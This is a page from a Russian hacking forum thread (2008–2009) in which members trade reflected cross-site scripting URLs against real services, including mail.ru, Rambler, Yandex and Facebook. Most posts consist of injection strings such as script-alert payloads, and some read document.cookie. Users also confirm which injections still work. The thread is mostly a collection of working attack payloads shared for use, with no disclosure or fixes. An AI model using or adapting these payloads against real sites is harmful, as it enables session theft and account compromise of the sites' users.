ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
Перезагрузить страницу Пассивные xss на почтовых серверах
   
Ответ
Страница 2 из 15 < 1 2 3 4 5 6 12 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 25.11.2008, 16:59
Аватар для Luccifer
Luccifer
Познающий
Регистрация: 05.12.2006
Сообщений: 63
Провел на форуме:
1269724

Репутация: 100
Отправить сообщение для Luccifer с помощью ICQ
По умолчанию
Mail.сру
http://content.mail.ru/search?q=%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E

http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1=phras e=&proto=1&url=%22%3E%3Cscript%3Ealert%28document. cookie%29%3C%2Fscript%3E&title=&descr=&owner=&cper son=&email=&phone=&fax=&address=&keywords=&session _id=16073130&category_id=10993&category_name=%CC%E 5%E4%E8%F6%E8%ED%E0+%E8+%E7%E4%EE%F0%EE%E2%FC%E5&p age=1&save=1

http://hosting.mail.ru/lc.jsp?loginput=&login=%22%3E%3Cscript%3Ealert('Lu ccifer')%3C%2Fscript%3E&password=


http://infobox.ru/index.php?=action=go&domain=%22%3E%3Cscript%3Ealer t('Luccifer')%3C%2Fscript%3E&tld=ru&x=21&y=4


http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1
В поле сайтайта URL вводим:
"><script>alert('Luccifer')</script>


http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert( 'Luccifer')%3C/script%3E=470


http://hosting.mail.ru/
в поле логин вводим
Код:
"><script>alert('xss')</script>
Последний раз редактировалось Luccifer; 25.11.2008 в 17:04..
 
Ответить с цитированием

  #12  
Старый 14.12.2008, 17:56
Аватар для ImpLex
ImpLex
Познающий
Регистрация: 12.12.2008
Сообщений: 31
Провел на форуме:
141806

Репутация: 68
По умолчанию
http://ds.rambler.ru/index.php?p=news&pubId=000000000000000000000000000 000000000000000000003&pubMode=%3Cscript%3Ealert()% 3C/script%3E
Была активная XSS, но топик для пассивных.
 
Ответить с цитированием

  #13  
Старый 19.12.2008, 22:20
Аватар для S0ulVortex
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию
Ну опять хсс убитого рамблера на котором даже те что есть не фиксят.
http://ftpsearch.rambler.ru/db/ftpsearch/search.html?btnG=%CD%E0%E9%F2%E8%21&words=(XSS)=5& form=0&hu=1&what=0

</title><script>alert('S0ulVortex')</script>
Последний раз редактировалось S0ulVortex; 19.12.2008 в 22:23..
 
Ответить с цитированием

  #14  
Старый 26.12.2008, 11:24
Аватар для Jazz
Jazz
Познающий
Регистрация: 27.09.2008
Сообщений: 67
Провел на форуме:
212146

Репутация: 8
По умолчанию
http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1
В поле сайтайта URL вводим:
"><script>alert('Luccifer')</script>


http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert( 'Luccifer')%3C/script%3E=470

уже не работают?или я не то делаю?
 
Ответить с цитированием

  #15  
Старый 26.12.2008, 11:31
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
не работают.
Код:
http://list.mail.ru/cgi-bin/olympic_calendar.cgi?sport=%3C/textarea%3E%27%22%3E%3Cscript%3Ealert('xss%20by%20f02')%3C/script%3E
эта работает.
Последний раз редактировалось faza02; 26.12.2008 в 11:34..
 
Ответить с цитированием

  #16  
Старый 31.12.2008, 21:21
Аватар для The matrix
The matrix
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345

Репутация: 573
Отправить сообщение для The matrix с помощью ICQ
По умолчанию
Хз. Может кто и находил. Просто рамблер совсем не фиксит XSS. Иметь там почтовый ящик не знающим просто опасно
Цитата:
http://miss.rambler.ru/srch/?sort=0&set=miss&words=%22%3E%3Cscript%3Ealert(/hacker?/)%3C/script%3E
 
Ответить с цитированием

  #17  
Старый 04.01.2009, 15:37
Аватар для iddqd
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию
Gala.net
Код:
http://forum.gala.net/?ff=1012&page=search&q=%22%2F%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&opt=and
 
Ответить с цитированием

  #18  
Старый 04.01.2009, 18:14
Аватар для iddqd
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию
ВШтате
Код:
http://vshtate.ru/reg?op=message&email=[XSS]
Но если авторизован, то не пашет
Короче, бесполезная
В профиле при добавлении инфы во многие поля срабатывает код, но сохраняется в отфильтрованом виде.
Непохек
 
Ответить с цитированием

  #19  
Старый 05.01.2009, 16:05
Аватар для baltazar
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию
Facebook.com




Код:
http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript
%3Ealert(document.cookie)%3C/script%3E

только толку от нее нету
 
Ответить с цитированием

  #20  
Старый 10.01.2009, 22:33
Аватар для lmns
lmns
Постоянный
Регистрация: 21.02.2007
Сообщений: 568
Провел на форуме:
2954516

Репутация: 303


По умолчанию
http://yandex.ru/cgi-bin/customize.pl?yxqs="><script>alert("XSS%20from%20lm ns")</script>
 
Ответить с цитированием
Ответ
Страница 2 из 15 < 1 2 3 4 5 6 12 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Сценарии/CMF/СMS 7 04.02.2010 02:55
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ